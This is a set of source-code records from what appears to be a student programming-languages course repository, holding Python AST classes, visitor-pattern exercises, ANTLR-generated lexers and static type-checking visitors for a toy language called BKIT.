Question3Parser#string}.\n\t * @param ctx the parse tree\n\t */\n\tvoid exitString(Question3Parser.StringContext ctx);\n}" }, { "alpha_fraction": 0.5298726558685303, "alphanum_fraction": 0.5377081036567688, "avg_line_length": 22.482759475708008, "blob_id": "6001faa56654a7583d0102ab1e10f70dad2e6dcf", "content_id": "98a2390f77d8c4f04bff0f0d2cb3d659270b1997", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2042, "license_type": "no_license", "max_line_length": 97, "num_lines": 87, "path": "/OOP/programmingCode/Question1.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "class Exp:\n def accept(self, func):\n pass\n\nclass IntLit(Exp):\n def __init__(self, _val):\n self.val = int(_val)\n \n def eval(self):\n return self.val\n\n def printPrefix(self):\n return str(self.val)\n \n def printPostfix(self):\n return str(self.val)\n\n\nclass FloatLit(Exp):\n def __init__(self, _num):\n self.val = float(_num)\n\n def eval(self):\n return self.val\n\n def printPrefix(self):\n return str(self.val)\n\n def printPostfix(self):\n return str(self.val)\n\nclass UnExp(Exp):\n def __init__(self, _op, _arg):\n self.operator = _op\n self.arg = _arg\n \n def eval(self):\n if self.operator == '+':\n return self.eval()\n \n if self.operator == '-':\n return 0 - self.arg.eval()\n \n def printPrefix(self):\n return self.operator + '.' + ' ' + self.arg.printPrefix()\n\n def printPostfix(self):\n return self.arg.printPostfix() + \" .\" + self.operator\n \n\nclass BinExp(Exp):\n def __init__(self, _left, _op, _right):\n self.operator = _op\n self.left = _left\n self.right = _right\n\n def eval(self):\n if self.operator == '+':\n return self.left.eval() + self.right.eval()\n \n if self.operator == '-':\n return self.left.eval() - self.right.eval()\n\n if self.operator == '*':\n return self.left.eval() * self.right.eval()\n\n if self.operator == '/':\n return self.left.eval() / self.right.eval()\n else:\n return None\n\n def printPrefix(self):\n return self.operator + ' ' + self.left.printPrefix() + ' ' + self.right.printPrefix()\n\n# class PrintPostfix():\n \n# def printPostfix(self):\n# return self.left.printPostfix() + ' ' + self.right.printPostfix() + ' ' + self.operator\n\nx0 = IntLit(1)\nx1 = UnExp(\"+\", x0)\nx2 = IntLit(1)\nx3 = IntLit(2)\nx4 = BinExp(x2, \"*\", x3)\nprint(x4.printPrefix())\n# print(x5.printPostfix())\n# print(x5.accept(x5.printPostfix))" }, { "alpha_fraction": 0.3322923183441162, "alphanum_fraction": 0.5249843597412109, "avg_line_length": 41.66666793823242, "blob_id": "68f8960b9c98ef64229127904bf39aae2f942e61", "content_id": "527f9ee13854d3f28ca9839eef3d8a29bf7624a4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3202, "license_type": "no_license", "max_line_length": 113, "num_lines": 75, "path": "/AST/assignment2/src/main/bkit/parser/.antlr/BKITLexer.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# Generated from /home/nguyendat/Documents/projects/PPL/AST/assignment2/src/main/bkit/parser/BKIT.g4 by ANTLR 4.8\nfrom antlr4 import *\nfrom io import StringIO\nfrom typing.io import TextIO\nimport sys\n\n\n\ndef serializedATN():\n with StringIO() as buf:\n buf.write(\"\\3\\u608b\\ua72a\\u8133\\ub9ed\\u417c\\u3be7\\u7786\\u5964\\2\\n\")\n buf.write(\"I\\b\\1\\4\\2\\t\\2\\4\\3\\t\\3\\4\\4\\t\\4\\4\\5\\t\\5\\4\\6\\t\\6\\4\\7\\t\\7\")\n buf.write(\"\\4\\b\\t\\b\\4\\t\\t\\t\\3\\2\\3\\2\\3\\3\\3\\3\\3\\4\\6\\4\\31\\n\\4\\r\\4\\16\")\n buf.write(\"\\4\\32\\3\\5\\3\\5\\3\\5\\3\\5\\3\\5\\3\\5\\3\\5\\3\\5\\3\\5\\5\\5&\\n\\5\\3\\6\")\n buf.write(\"\\3\\6\\3\\6\\3\\6\\3\\6\\5\\6-\\n\\6\\3\\7\\3\\7\\3\\7\\3\\7\\3\\7\\3\\7\\3\\7\")\n buf.write(\"\\3\\7\\3\\7\\3\\7\\5\\79\\n\\7\\3\\b\\3\\b\\3\\b\\3\\b\\3\\b\\3\\b\\3\\b\\3\\b\")\n buf.write(\"\\5\\bC\\n\\b\\3\\t\\6\\tF\\n\\t\\r\\t\\16\\tG\\2\\2\\n\\3\\3\\5\\4\\7\\5\\t\\6\")\n buf.write(\"\\13\\7\\r\\b\\17\\t\\21\\n\\3\\2\\5\\3\\2\\62;\\4\\2>>@@\\3\\2c|\\2T\\2\\3\")\n buf.write(\"\\3\\2\\2\\2\\2\\5\\3\\2\\2\\2\\2\\7\\3\\2\\2\\2\\2\\t\\3\\2\\2\\2\\2\\13\\3\\2\")\n buf.write(\"\\2\\2\\2\\r\\3\\2\\2\\2\\2\\17\\3\\2\\2\\2\\2\\21\\3\\2\\2\\2\\3\\23\\3\\2\\2\")\n buf.write(\"\\2\\5\\25\\3\\2\\2\\2\\7\\30\\3\\2\\2\\2\\t%\\3\\2\\2\\2\\13,\\3\\2\\2\\2\\r\")\n buf.write(\"8\\3\\2\\2\\2\\17B\\3\\2\\2\\2\\21E\\3\\2\\2\\2\\23\\24\\7*\\2\\2\\24\\4\\3\")\n buf.write(\"\\2\\2\\2\\25\\26\\7+\\2\\2\\26\\6\\3\\2\\2\\2\\27\\31\\t\\2\\2\\2\\30\\27\\3\")\n buf.write(\"\\2\\2\\2\\31\\32\\3\\2\\2\\2\\32\\30\\3\\2\\2\\2\\32\\33\\3\\2\\2\\2\\33\\b\")\n buf.write(\"\\3\\2\\2\\2\\34\\35\\7V\\2\\2\\35\\36\\7t\\2\\2\\36\\37\\7w\\2\\2\\37&\\7\")\n buf.write(\"g\\2\\2 !\\7H\\2\\2!\\\"\\7c\\2\\2\\\"#\\7n\\2\\2#$\\7u\\2\\2$&\\7g\\2\\2%\")\n buf.write(\"\\34\\3\\2\\2\\2% \\3\\2\\2\\2&\\n\\3\\2\\2\\2\\'(\\7c\\2\\2()\\7p\\2\\2)-\")\n buf.write(\"\\7f\\2\\2*+\\7q\\2\\2+-\\7t\\2\\2,\\'\\3\\2\\2\\2,*\\3\\2\\2\\2-\\f\\3\\2\")\n buf.write(\"\\2\\2./\\7-\\2\\2/9\\7?\\2\\2\\60\\61\\7/\\2\\2\\619\\7?\\2\\2\\62\\63\\7\")\n buf.write(\"(\\2\\2\\639\\7?\\2\\2\\64\\65\\7~\\2\\2\\659\\7?\\2\\2\\66\\67\\7<\\2\\2\")\n buf.write(\"\\679\\7?\\2\\28.\\3\\2\\2\\28\\60\\3\\2\\2\\28\\62\\3\\2\\2\\28\\64\\3\\2\")\n buf.write(\"\\2\\28\\66\\3\\2\\2\\29\\16\\3\\2\\2\\2:C\\7?\\2\\2;<\\7>\\2\\2<C\\7@\\2\")\n buf.write(\"\\2=>\\7@\\2\\2>C\\7?\\2\\2?@\\7>\\2\\2@C\\7?\\2\\2AC\\t\\3\\2\\2B:\\3\\2\")\n buf.write(\"\\2\\2B;\\3\\2\\2\\2B=\\3\\2\\2\\2B?\\3\\2\\2\\2BA\\3\\2\\2\\2C\\20\\3\\2\\2\")\n buf.write(\"\\2DF\\t\\4\\2\\2ED\\3\\2\\2\\2FG\\3\\2\\2\\2GE\\3\\2\\2\\2GH\\3\\2\\2\\2H\")\n buf.write(\"\\22\\3\\2\\2\\2\\t\\2\\32%,8BG\\2\")\n return buf.getvalue()\n\n\nclass BKITLexer(Lexer):\n\n atn = ATNDeserializer().deserialize(serializedATN())\n\n decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]\n\n T__0 = 1\n T__1 = 2\n INTLIT = 3\n BOOLIT = 4\n ANDOR = 5\n ASSIGN = 6\n COMPARE = 7\n ID = 8\n\n channelNames = [ u\"DEFAULT_TOKEN_CHANNEL\", u\"HIDDEN\" ]\n\n modeNames = [ \"DEFAULT_MODE\" ]\n\n literalNames = [ \"<INVALID>\",\n \"'('\", \"')'\" ]\n\n symbolicNames = [ \"<INVALID>\",\n \"INTLIT\", \"BOOLIT\", \"ANDOR\", \"ASSIGN\", \"COMPARE\", \"ID\" ]\n\n ruleNames = [ \"T__0\", \"T__1\", \"INTLIT\", \"BOOLIT\", \"ANDOR\", \"ASSIGN\", \n \"COMPARE\", \"ID\" ]\n\n grammarFileName = \"BKIT.g4\"\n\n def __init__(self, input=None, output:TextIO = sys.stdout):\n super().__init__(input, output)\n self.checkVersion(\"4.8\")\n self._interp = LexerATNSimulator(self, self.atn, self.decisionsToDFA, PredictionContextCache())\n self._actions = None\n self._predicates = None\n\n\n" }, { "alpha_fraction": 0.49857985973358154, "alphanum_fraction": 0.5077561736106873, "avg_line_length": 25.604650497436523, "blob_id": "33a3399ce33f2122fcb137825f647581c781d924", "content_id": "c21c0b8c20e4390ccc7acd6bdffb7ad47e2d7c75", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4577, "license_type": "no_license", "max_line_length": 99, "num_lines": 172, "path": "/type/Q3.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "from abc import ABC\nclass Program: pass #decl:List[VarDecl],stmts:List[Assign]\n\nclass VarDecl: pass #name:str\n\nclass Assign: pass#lhs:Id,rhs:Exp\n\nclass Exp(ABC): pass#abstract class\n\nclass BinOp(Exp): pass#op:str,e1:Exp,e2:Exp #op is +,-,*,/,+.,-.,*.,/., &&,||, >, >., >b, =, =., =b\n\nclass UnOp(Exp): pass#op:str,e:Exp #op is -,-., !,i2f, floor\n\nclass IntLit(Exp): pass#val:int\n\nclass FloatLit(Exp): pass#val:float\n\nclass BoolLit(Exp): pass#val:bool\n\nclass Id(Exp): pass#name:str\n\nclass TypeMismatchInExpression(Exception): pass\n\nclass TypeCannotBeInferred(Exception): pass\n\nclass TypeMismatchInStatement(Exception): pass\n\nclass UndeclaredIdentifier(Exception): pass\n\nclass Visitor():\n pass\n\nfrom functools import reduce\nclass StaticCheck(Visitor):\n\n def visitProgram(self,ctx:Program,o):\n list_decl = list(map(lambda x: self.visitVarDecl(x, o), ctx.decl))\n env = {'ctx': None}\n for d in list_decl:\n env.update(d)\n for stmt in ctx.stmts:\n self.visitAssign(stmt, env)\n\n def visitVarDecl(self,ctx:VarDecl,o):\n return {ctx.name: None}\n\n def visitAssign(self,ctx:Assign,o):\n o['ctx'] = None\n rhs = self.visit(ctx.rhs, o)\n o['ctx'] = None\n try:\n lhs = self.visit(ctx.lhs, o)\n except TypeCannotBeInferred as e:\n lhs = o[ctx.lhs.name]\n if type(lhs) == type(rhs):\n if lhs == None:\n raise TypeCannotBeInferred(ctx)\n else: return\n if lhs == None:\n o[ctx.lhs.name] = rhs\n return\n if isinstance(rhs, Id):\n rhs = lhs\n raise TypeMismatchInStatement(ctx)\n\n def visitBinOp(self,ctx:BinOp,o):\n if ctx.op in ['+', '-', '*', '/']:\n o['ctx'] = IntLit(0)\n a = self.visit(ctx.e1, o)\n\n o['ctx'] = IntLit(0)\n b = self.visit(ctx.e2, o)\n\n if isinstance(a, IntLit) and isinstance(b, IntLit):\n return IntLit(0)\n\n if ctx.op in ['+.', '-.', '*.', '/.']:\n o['ctx'] = FloatLit(0)\n a = self.visit(ctx.e1, o)\n\n o['ctx'] = FloatLit(0)\n b = self.visit(ctx.e2, o)\n\n if isinstance(a, FloatLit) and isinstance(b, FloatLit):\n return FloatLit(0)\n\n if ctx.op in ['>', '=']:\n o['ctx'] = IntLit(0)\n a = self.visit(ctx.e1, o)\n\n o['ctx'] = IntLit(0)\n b = self.visit(ctx.e2, o)\n\n if isinstance(a, IntLit) and isinstance(b, IntLit):\n return BoolLit(0)\n\n if ctx.op in ['>.', '=.']:\n o['ctx'] = FloatLit(0)\n a = self.visit(ctx.e1, o)\n\n o['ctx'] = FloatLit(0)\n b = self.visit(ctx.e2, o)\n\n if isinstance(a, FloatLit) and isinstance(b, FloatLit):\n return BoolLit(0)\n\n if ctx.op in ['!','&&', '||', '>b', '=b']:\n o['ctx'] = BoolLit(0)\n a = self.visit(ctx.e1, o)\n\n o['ctx'] = BoolLit(0)\n b = self.visit(ctx.e2, o)\n\n if isinstance(a, BoolLit) and isinstance(b, BoolLit):\n return BoolLit(0)\n\n raise TypeMismatchInExpression(ctx)\n\n def visitUnOp(self,ctx:UnOp,o):\n if ctx.op in ['-']:\n o['ctx'] = IntLit(0)\n a = self.visit(ctx.e, o)\n\n if isinstance(a, IntLit):\n return IntLit(0)\n\n if ctx.op in ['-.']:\n o['ctx'] = FloatLit(0)\n a = self.visit(ctx.e, o)\n\n if isinstance(a, FloatLit):\n return FloatLit(0)\n\n if ctx.op in ['!']:\n o['ctx'] = BoolLit(0)\n a = self.visit(ctx.e, o)\n\n if isinstance(a, BoolLit):\n return BoolLit(0)\n\n if ctx.op in ['i2f']:\n o['ctx'] = IntLit(0)\n a = self.visit(ctx.e, o)\n\n if isinstance(a, IntLit):\n return FloatLit(0)\n\n if ctx.op in ['floor']:\n o['ctx'] = FloatLit(0)\n a = self.visit(ctx.e, o)\n\n if isinstance(a, FloatLit):\n return IntLit(0)\n\n raise TypeMismatchInExpression(ctx)\n\n def visitIntLit(self,ctx:IntLit,o):\n return IntLit(0)\n\n def visitFloatLit(self,ctx:FloatLit,o):\n return FloatLit(1.1)\n\n def visitBoolLit(self,ctx:BoolLit,o):\n return BoolLit(True)\n\n def visitId(self,ctx:Id,o):\n if ctx.name not in o:\n raise UndeclaredIdentifier(ctx.name)\n \n if o[ctx.name] == None:\n o[ctx.name] = o['ctx']\n return o[ctx.name]\n\n" }, { "alpha_fraction": 0.6105303764343262, "alphanum_fraction": 0.6109175086021423, "avg_line_length": 35.39436721801758, "blob_id": "33b411738c6b190df4e6e071760d6c3e397dddcc", "content_id": "95c6054aeae1c8faf32cefd5b9b729e20afa4c73", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2583, "license_type": "no_license", "max_line_length": 96, "num_lines": 71, "path": "/AST/assignment2/src/main/bkit/astgen/ASTGeneration2.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# class ASTGeneration(MPVisitor):\n \n# def visitProgram(self,ctx:MPParser.ProgramContext):\n# return Program(self.visitVardecls(ctx.vardecls())) if ctx.vardecls() else None\n\n# def visitVardecls(self,ctx:MPParser.VardeclsContext):\n# return self.visitVardecl(ctx.vardecl()) + self.visitVardecltail(ctx.vardecltail())\n\n# def visitVardecltail(self,ctx:MPParser.VardecltailContext): \n# if ctx.vardecl() and ctx.vardecltail():\n# return self.visitVardecl(ctx.vardecl()) + self.visitVardecltail(ctx.vardecltail())\n# return []\n\n# def visitVardecl(self,ctx:MPParser.VardeclContext): \n# var_type = self.visitMptype(ctx.mptype())\n# return list(map(lambda x: VarDecl(x, var_type), self.visitIds(ctx.ids())))\n\n# def visitMptype(self,ctx:MPParser.MptypeContext):\n# if ctx.INTTYPE():\n# return IntType()\n# else:\n# return FloatType()\n\n# def visitIds(self,ctx:MPParser.IdsContext):\n# if ctx.ids():\n# return self.visitIds(ctx.ids()) + [Id(ctx.ID().getText())]\n# else:\n# if ctx.ID():\n# return [Id(ctx.ID().getText())]\n# else:\n# return []\n\n\nfrom BKITVisitor import BKITVisitor\nfrom BKITParser import BKITParser\nfrom AST import *\n\nclass ASTGeneration(BKITVisitor):\n \n def visitProgram(self,ctx:BKITParser.ProgramContext):\n return Program(self.visitVardecls(ctx.vardecls())) if ctx.vardecls() else None\n\n def visitVardecls(self,ctx:BKITParser.VardeclsContext):\n return self.visitVardecl(ctx.vardecl()) + self.visitVardecltail(ctx.vardecltail())\n\n def visitVardecltail(self,ctx:BKITParser.VardecltailContext): \n if ctx.vardecl() and ctx.vardecltail():\n return self.visitVardecl(ctx.vardecl()) + self.visitVardecltail(ctx.vardecltail())\n return []\n\n def visitVardecl(self,ctx:BKITParser.VardeclContext):\n if ctx.ids(): \n var_type = self.visitMptype(ctx.mptype())\n return list(map(lambda x: VarDecl(x, var_type), self.visitIds(ctx.ids())))[::-1]\n else:\n return []\n\n def visitMptype(self,ctx:BKITParser.MptypeContext):\n if ctx.INTTYPE():\n return IntType()\n else:\n return FloatType() \n\n def visitIds(self,ctx:BKITParser.IdsContext):\n if ctx.ids():\n return self.visitIds(ctx.ids()) + [Id(ctx.ID().getText())]\n else:\n if ctx.ID():\n return [Id(ctx.ID().getText())]\n else:\n return []" }, { "alpha_fraction": 0.4605887830257416, "alphanum_fraction": 0.4743589758872986, "avg_line_length": 28.055171966552734, "blob_id": "fecd79ddf7c5181a20e473b5f008ce052e9b4e0e", "content_id": "278cfee7acb7faded9326ededa92f45d896cc57f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4212, "license_type": "no_license", "max_line_length": 71, "num_lines": 145, "path": "/type/test.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "from functools import reduce\nclass StaticCheck(Visitor):\n\n def visitProgram(self,ctx:Program,o):\n env = dict({'ctx': None})\n reduce(lambda env, x: self.visitVarDecl(x, env), ctx.decl, env)\n for stmt in ctx.stmts:\n self.visit(stmt, [env])\n \n def visitBlock(self,ctx:Block,o):\n env = dict({'ctx': None})\n reduce(lambda env, x: self.visitVarDecl(x, env), ctx.decl, env)\n for stmt in ctx.stmts:\n self.visitAssign(stmt, [env]+o)\n\n def visitVarDecl(self,ctx:VarDecl,o):\n if ctx.name in o:\n raise Redeclared(ctx)\n o.update(dict({ctx.name: None}))\n\n def visitAssign(self,ctx:Assign,o):\n o[0]['ctx'] = None\n rhs = self.visit(ctx.rhs, o)\n o[0]['ctx'] = None\n lhs = self.visit(ctx.lhs, o)\n if type(lhs) == type(rhs):\n if lhs == None:\n raise TypeCannotBeInferred(ctx)\n else:\n return\n if lhs == None:\n o[0][ctx.lhs.name] = rhs\n return\n if isinstance(ctx.rhs, Id) and rhs == None:\n o[0][ctx.rhs.name] = lhs\n return\n raise TypeMismatchInStatement(ctx)\n\n def visitBinOp(self,ctx:BinOp,o):\n if ctx.op in ['+', '-', '*', '/']:\n o[0]['ctx'] = IntLit(0)\n a = self.visit(ctx.e1, o)\n\n o[0]['ctx'] = IntLit(0)\n b = self.visit(ctx.e2, o)\n\n if isinstance(a, IntLit) and isinstance(b, IntLit):\n return IntLit(0)\n\n if ctx.op in ['+.', '-.', '*.', '/.']:\n o[0]['ctx'] = FloatLit(0)\n a = self.visit(ctx.e1, o)\n\n o[0]['ctx'] = FloatLit(0)\n b = self.visit(ctx.e2, o)\n\n if isinstance(a, FloatLit) and isinstance(b, FloatLit):\n return FloatLit(0)\n\n if ctx.op in ['>', '=']:\n o[0]['ctx'] = IntLit(0)\n a = self.visit(ctx.e1, o)\n\n o[0]['ctx'] = IntLit(0)\n b = self.visit(ctx.e2, o)\n\n if isinstance(a, IntLit) and isinstance(b, IntLit):\n return BoolLit(0)\n\n if ctx.op in ['>.', '=.']:\n o[0]['ctx'] = FloatLit(0)\n a = self.visit(ctx.e1, o)\n\n o[0]['ctx'] = FloatLit(0)\n b = self.visit(ctx.e2, o)\n\n if isinstance(a, FloatLit) and isinstance(b, FloatLit):\n return BoolLit(0)\n\n if ctx.op in ['!','&&', '||', '>b', '=b']:\n o[0]['ctx'] = BoolLit(0)\n a = self.visit(ctx.e1, o)\n\n o[0]['ctx'] = BoolLit(0)\n b = self.visit(ctx.e2, o)\n\n if isinstance(a, BoolLit) and isinstance(b, BoolLit):\n return BoolLit(0)\n\n raise TypeMismatchInExpression(ctx)\n\n def visitUnOp(self,ctx:UnOp,o):\n if ctx.op in ['-']:\n o[0]['ctx'] = IntLit(0)\n a = self.visit(ctx.e, o)\n\n if isinstance(a, IntLit):\n return IntLit(0)\n\n if ctx.op in ['-.']:\n o[0]['ctx'] = FloatLit(0)\n a = self.visit(ctx.e, o)\n\n if isinstance(a, FloatLit):\n return FloatLit(0)\n\n if ctx.op in ['!']:\n o[0]['ctx'] = BoolLit(0)\n a = self.visit(ctx.e, o)\n\n if isinstance(a, BoolLit):\n return BoolLit(0)\n\n if ctx.op in ['i2f']:\n o[0]['ctx'] = IntLit(0)\n a = self.visit(ctx.e, o)\n\n if isinstance(a, IntLit):\n return FloatLit(0)\n\n if ctx.op in ['floor']:\n o[0]['ctx'] = FloatLit(0)\n a = self.visit(ctx.e, o)\n\n if isinstance(a, FloatLit):\n return IntLit(0)\n\n raise TypeMismatchInExpression(ctx)\n\n def visitIntLit(self,ctx:IntLit,o):\n return IntLit(0)\n\n def visitFloatLit(self,ctx:FloatLit,o):\n return FloatLit(1.1)\n\n def visitBoolLit(self,ctx:BoolLit,o):\n return BoolLit(True)\n\n def visitId(self,ctx:Id,o):\n for scope in o:\n if ctx.name in scope:\n if scope[ctx.name] == None:\n scope[ctx.name] = scope['ctx']\n return scope[ctx.name]\n raise UndeclaredIdentifier(ctx.name)" }, { "alpha_fraction": 0.5179340243339539, "alphanum_fraction": 0.5329985618591309, "avg_line_length": 22.436975479125977, "blob_id": "688da6dd015ba1e90fbdea008b9234b94cea3db8", "content_id": "17e2477cc816370eb5322c7e9cd4eede37bbf8bb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2788, "license_type": "no_license", "max_line_length": 93, "num_lines": 119, "path": "/OOP/programmingCode/Question2.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "class Exp:\n pass\n\nclass IntLit(Exp):\n def __init__(self, _val):\n self.val = int(_val)\n \n def accept(self, visitor):\n return visitor.intlit(self.val)\n\n\nclass FloatLit(Exp):\n def __init__(self, _num):\n self.val = float(_num)\n\n def accept(self, visitor):\n return visitor.floatlit(self.val)\n\nclass UnExp(Exp):\n def __init__(self, _op, _arg):\n self.operator = _op\n self.arg = _arg\n \n def accept(self, visitor):\n return visitor.unexp(self.operator, self.arg)\n\nclass BinExp(Exp):\n def __init__(self, _left, _op, _right):\n self.operator = _op\n self.left = _left\n self.right = _right\n\n def accept(self, visitor):\n return visitor.binexp(self.left, self.operator, self.right)\n\nclass Eval(Exp):\n def __init__(self):\n pass\n\n def intlit(self, x):\n return x\n\n def floatlit(self, x):\n return x\n\n def binexp(self, _left, _op, _right):\n\n if _op == '+':\n return _left.accept(Eval()) + _right.accept(Eval())\n elif _op == '-':\n return _left.accept(Eval()) - _right.accept(Eval())\n elif _op == '*':\n return _left.accept(Eval()) * _right.accept(Eval())\n elif _op == '/':\n return _left.accept(Eval()) / _right.accept(Eval())\n \n def unexp(self, _op, _arg):\n if _op == '+':\n return _arg.accept(Eval())\n elif _op == '-':\n return - _arg.accept(Eval())\n\nclass PrintPrefix():\n def __init__(self):\n pass\n\n def intlit(self, _val):\n return str(_val)\n\n def floatlit(self, _val):\n return str(_val)\n\n def binexp(self, _left, _op, _right):\n return _op + ' ' + _left.accept(PrintPrefix()) + ' ' + _right.accept(PrintPrefix())\n\n def unexp(self, _op, _arg):\n return _op + '.' + ' ' + _arg.accept(PrintPrefix())\n\nclass PrintPostfix():\n def __init__(self):\n pass\n\n def intlit(self, _val):\n return str(_val)\n\n def floatlit(self, _val):\n return str(_val)\n\n def binexp(self, _left, _op, _right):\n return _left.accept(PrintPostfix()) + ' ' + _right.accept(PrintPostfix()) + ' ' + _op\n\n def unexp(self, _op, _arg):\n return _arg.accept(PrintPostfix()) + ' ' + _op + '.'\n\n\nx1 = IntLit(3)\nx2 = IntLit(4)\nx3 = FloatLit(2.0)\n\nx4 = BinExp(x2, '*', x3)\nx5 = BinExp(x1, '+', x4)\nx6 = UnExp('-', x5)\n# -(3 + 4 * 2.0)\nx7 = BinExp(x5, '*', UnExp('-', x1))\n# 3 + 4 * 2.0 * -3\nx8 = BinExp(UnExp('-', x1), '*', x5)\n\nx9 = BinExp(x1, \"+\", x2)\n\n# print(x6.eval())\n# print(x6.printPrefix())\nprint(x9.accept(Eval()))\nprint(x7.accept(Eval()))\nprint(x7.accept(PrintPrefix()))\nprint(x7.accept(PrintPostfix()))\n\nprint(x8.accept(Eval()))\nprint(x8.accept(PrintPrefix()))\nprint(x8.accept(PrintPostfix()))" }, { "alpha_fraction": 0.298257052898407, "alphanum_fraction": 0.5620622038841248, "avg_line_length": 56.90565872192383, "blob_id": "c2e9dbe3ae8f2d2ce11ae349bb354961a196691a", "content_id": "dff8eab0ab5ab4dc89236ba639675cbde80dbc83", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12278, "license_type": "no_license", "max_line_length": 103, "num_lines": 212, "path": "/LexicalAnalysis/target/main/bkit/parser/BKITLexer.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# Generated from main/bkit/parser/BKIT.g4 by ANTLR 4.8\nfrom antlr4 import *\nfrom io import StringIO\nfrom typing.io import TextIO\nimport sys\n\n\nfrom lexererr import *\n\n\n\ndef serializedATN():\n with StringIO() as buf:\n buf.write(\"\\3\\u608b\\ua72a\\u8133\\ub9ed\\u417c\\u3be7\\u7786\\u5964\\2\\21\")\n buf.write(\"\\u011d\\b\\1\\4\\2\\t\\2\\4\\3\\t\\3\\4\\4\\t\\4\\4\\5\\t\\5\\4\\6\\t\\6\\4\\7\")\n buf.write(\"\\t\\7\\4\\b\\t\\b\\4\\t\\t\\t\\4\\n\\t\\n\\4\\13\\t\\13\\4\\f\\t\\f\\4\\r\\t\\r\")\n buf.write(\"\\4\\16\\t\\16\\4\\17\\t\\17\\4\\20\\t\\20\\4\\21\\t\\21\\4\\22\\t\\22\\4\\23\")\n buf.write(\"\\t\\23\\4\\24\\t\\24\\4\\25\\t\\25\\4\\26\\t\\26\\4\\27\\t\\27\\4\\30\\t\\30\")\n buf.write(\"\\4\\31\\t\\31\\4\\32\\t\\32\\4\\33\\t\\33\\4\\34\\t\\34\\4\\35\\t\\35\\4\\36\")\n buf.write(\"\\t\\36\\4\\37\\t\\37\\4 \\t \\4!\\t!\\4\\\"\\t\\\"\\4#\\t#\\4$\\t$\\4%\\t%\")\n buf.write(\"\\4&\\t&\\3\\2\\6\\2O\\n\\2\\r\\2\\16\\2P\\3\\2\\7\\2T\\n\\2\\f\\2\\16\\2W\\13\")\n buf.write(\"\\2\\6\\2Y\\n\\2\\r\\2\\16\\2Z\\3\\2\\3\\2\\3\\3\\3\\3\\3\\3\\3\\4\\3\\4\\3\\4\")\n buf.write(\"\\3\\4\\5\\4f\\n\\4\\3\\5\\3\\5\\3\\5\\3\\5\\7\\5l\\n\\5\\f\\5\\16\\5o\\13\\5\")\n buf.write(\"\\3\\6\\3\\6\\3\\7\\3\\7\\3\\b\\3\\b\\3\\t\\5\\tx\\n\\t\\3\\n\\3\\n\\3\\13\\3\\13\")\n buf.write(\"\\3\\13\\3\\f\\3\\f\\3\\f\\5\\f\\u0082\\n\\f\\3\\r\\3\\r\\3\\r\\6\\r\\u0087\")\n buf.write(\"\\n\\r\\r\\r\\16\\r\\u0088\\3\\16\\3\\16\\7\\16\\u008d\\n\\16\\f\\16\\16\")\n buf.write(\"\\16\\u0090\\13\\16\\3\\17\\6\\17\\u0093\\n\\17\\r\\17\\16\\17\\u0094\")\n buf.write(\"\\3\\17\\3\\17\\5\\17\\u0099\\n\\17\\3\\17\\5\\17\\u009c\\n\\17\\3\\20\\3\")\n buf.write(\"\\20\\3\\21\\3\\21\\3\\22\\3\\22\\3\\23\\3\\23\\3\\24\\3\\24\\3\\25\\3\\25\")\n buf.write(\"\\3\\26\\3\\26\\3\\27\\3\\27\\3\\30\\3\\30\\3\\31\\3\\31\\3\\31\\3\\31\\3\\32\")\n buf.write(\"\\3\\32\\3\\32\\3\\32\\5\\32\\u00b8\\n\\32\\3\\32\\6\\32\\u00bb\\n\\32\\r\")\n buf.write(\"\\32\\16\\32\\u00bc\\3\\33\\6\\33\\u00c0\\n\\33\\r\\33\\16\\33\\u00c1\")\n buf.write(\"\\3\\34\\3\\34\\3\\34\\3\\34\\5\\34\\u00c8\\n\\34\\3\\34\\6\\34\\u00cb\\n\")\n buf.write(\"\\34\\r\\34\\16\\34\\u00cc\\3\\35\\3\\35\\5\\35\\u00d1\\n\\35\\3\\36\\3\")\n buf.write(\"\\36\\3\\36\\3\\36\\3\\36\\3\\36\\5\\36\\u00d9\\n\\36\\3\\37\\3\\37\\3\\37\")\n buf.write(\"\\3\\37\\5\\37\\u00df\\n\\37\\3 \\3 \\3 \\7 \\u00e4\\n \\f \\16 \\u00e7\")\n buf.write(\"\\13 \\3!\\3!\\7!\\u00eb\\n!\\f!\\16!\\u00ee\\13!\\3!\\3!\\3\\\"\\6\\\"\")\n buf.write(\"\\u00f3\\n\\\"\\r\\\"\\16\\\"\\u00f4\\3\\\"\\3\\\"\\3#\\3#\\7#\\u00fb\\n#\\f\")\n buf.write(\"#\\16#\\u00fe\\13#\\3#\\5#\\u0101\\n#\\3$\\3$\\3%\\3%\\3%\\3%\\7%\\u0109\")\n buf.write(\"\\n%\\f%\\16%\\u010c\\13%\\3%\\3%\\3%\\3%\\3%\\3&\\3&\\3&\\3&\\7&\\u0117\")\n buf.write(\"\\n&\\f&\\16&\\u011a\\13&\\3&\\3&\\4\\u010a\\u0118\\2\\'\\3\\3\\5\\4\\7\")\n buf.write(\"\\5\\t\\6\\13\\2\\r\\2\\17\\2\\21\\2\\23\\2\\25\\2\\27\\2\\31\\2\\33\\2\\35\")\n buf.write(\"\\2\\37\\2!\\2#\\2%\\2\\'\\2)\\7+\\b-\\t/\\n\\61\\13\\63\\2\\65\\2\\67\\2\")\n buf.write(\"9\\2;\\2=\\2?\\2A\\fC\\rE\\16G\\17I\\20K\\21\\3\\2\\23\\3\\2c|\\3\\2C\\\\\")\n buf.write(\"\\3\\2\\62;\\4\\2--//\\3\\2\\\"\\\"\\t\\2))^^ddhhppttvv\\3\\2^^\\3\\2g\")\n 